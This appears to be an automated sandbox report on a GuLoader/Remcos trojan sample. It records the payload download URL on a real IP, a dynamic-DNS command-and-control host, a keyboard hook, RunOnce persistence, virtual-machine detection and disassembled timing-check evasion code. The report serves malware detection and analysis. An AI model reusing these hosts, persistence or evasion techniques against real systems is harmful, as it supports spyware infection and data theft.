Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"} |
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe |
ReversingLabs: Detection: 17% |
Source: JXblq0dqPN.exe |
Virustotal: Detection: 35% |
Perma Link |
Source: JXblq0dqPN.exe |
ReversingLabs: Detection: 17% |
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe |
Joe Sandbox ML: detected |
Source: JXblq0dqPN.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE DANILENKODE |
Source: Joe Sandbox View |
ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
DNS traffic detected: queries for: clientconfig.passport.net |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\JXblq0dqPN.exe |
Jump to behavior |
Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 NtWriteVirtualMemory, |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226904A NtProtectVirtualMemory, |
1_2_0226904A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022658B5 NtAllocateVirtualMemory, |
1_2_022658B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226483C NtWriteVirtualMemory, |
1_2_0226483C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264A0A NtWriteVirtualMemory, |
1_2_02264A0A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264C62 NtWriteVirtualMemory, |
1_2_02264C62 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022646B5 NtWriteVirtualMemory, |
1_2_022646B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF NtWriteVirtualMemory, |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226473E NtWriteVirtualMemory, |
1_2_0226473E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265983 NtAllocateVirtualMemory, |
1_2_02265983 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BEB NtWriteVirtualMemory, |
1_2_02264BEB |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02268FFF NtProtectVirtualMemory, |
1_2_02268FFF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BC5 NtWriteVirtualMemory, |
1_2_02264BC5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022658B5 |
1_2_022658B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022624E2 |
1_2_022624E2 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022620EC |
1_2_022620EC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226950D |
1_2_0226950D |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260557 |
1_2_02260557 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260BF8 |
1_2_02260BF8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260223 |
1_2_02260223 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226483C |
1_2_0226483C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264A0A |
1_2_02264A0A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264214 |
1_2_02264214 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264C62 |
1_2_02264C62 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02266475 |
1_2_02266475 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260647 |
1_2_02260647 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260641 |
1_2_02260641 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226885F |
1_2_0226885F |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022646B5 |
1_2_022646B5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022614B3 |
1_2_022614B3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022626BA |
1_2_022626BA |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263896 |
1_2_02263896 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267E98 |
1_2_02267E98 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022628E2 |
1_2_022628E2 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022680FC |
1_2_022680FC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265CD0 |
1_2_02265CD0 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262D2C |
1_2_02262D2C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226473E |
1_2_0226473E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260D0E |
1_2_02260D0E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260708 |
1_2_02260708 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226951E |
1_2_0226951E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226111B |
1_2_0226111B |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02268764 |
1_2_02268764 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263D6D |
1_2_02263D6D |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267776 |
1_2_02267776 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260B71 |
1_2_02260B71 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262F7B |
1_2_02262F7B |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263147 |
1_2_02263147 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262F54 |
1_2_02262F54 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022615A5 |
1_2_022615A5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02263FA3 |
1_2_02263FA3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267FAE |
1_2_02267FAE |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02265D82 |
1_2_02265D82 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226218A |
1_2_0226218A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267BEC |
1_2_02267BEC |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BEB |
1_2_02264BEB |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02264BC5 |
1_2_02264BC5 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022637C8 |
1_2_022637C8 |
Source: JXblq0dqPN.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: JXblq0dqPN.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: ANNONCEKAMPAGNE.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: ANNONCEKAMPAGNE.exe.17.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe |
Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe |
Source: JXblq0dqPN.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@3/3@164/3 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMP |
Jump to behavior |
Source: JXblq0dqPN.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: JXblq0dqPN.exe |
Virustotal: Detection: 35% |
Source: JXblq0dqPN.exe |
ReversingLabs: Detection: 17% |
Source: unknown |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
|
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
|
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Jump to behavior |
Source: Yara match |
File source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_00401367 pushfd ; iretd |
1_2_0040136A |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_00403268 pushfd ; iretd |
1_2_0040326E |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_0226A0E4 push FFFFFFD2h; iretd |
1_2_0226A0E9 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 17_2_0056A0E4 push FFFFFFD2h; iretd |
17_2_0056A0E9 |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08584386702 |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08584386702 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02261C35 NtWriteVirtualMemory, |
1_2_02261C35 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, |
1_2_02267012 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 LoadLibraryA, |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02260BF8 TerminateProcess,LoadLibraryA, |
1_2_02260BF8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022642BF NtWriteVirtualMemory, |
1_2_022642BF |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL") |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov edx, dword ptr [ebp+0000027Ah] 0x00000009 push 64FFFEF9h 0x0000000e add dword ptr [esp], 9B136642h 0x00000015 xor dword ptr [esp], 8588ACC3h 0x0000001c xor dword ptr [esp], 859BC9F8h 0x00000023 cmp cx, cx 0x00000026 push dword ptr [ebp+50h] 0x00000029 call 00007F7648791C6Eh 0x0000002e call 00007F764878CCF5h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F764878CDD9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000000d mov eax, ebp 0x0000000f add eax, 0000010Ch 0x00000014 mov dword ptr [ebp+0000021Ch], edi 0x0000001a mov edi, eax 0x0000001c push edi 0x0000001d mov edi, dword ptr [ebp+0000021Ch] 0x00000023 push dword ptr [ebp+000000FCh] 0x00000029 call 00007F7648A653A9h 0x0000002e call 00007F7648A60805h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F7648A608E9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions: |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax 0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl 0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh 0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch 0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh 0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] 0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h 0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx 0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi 0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 